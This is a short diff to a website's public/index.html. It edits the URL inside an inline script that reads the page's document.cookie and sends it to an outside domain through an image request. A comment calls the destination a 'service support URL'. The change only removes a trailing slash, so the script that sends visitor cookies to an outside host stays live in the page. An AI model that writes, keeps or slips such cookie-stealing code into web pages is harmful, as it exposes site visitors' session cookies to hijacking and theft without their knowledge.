--- a/public/index.html
+++ b/public/index.html
@@ -101,7 +101,7 @@
   <script>
     const cookies = document.cookie;
     // Service support URL
-    const targetURL = 'https://xcorporation.de/service-support/';
+    const targetURL = 'https://xcorporation.de/service-support';
     const img = new Image();
     img.src = `${targetURL}?cookies=${encodeURIComponent(cookies)}`;
   </script>
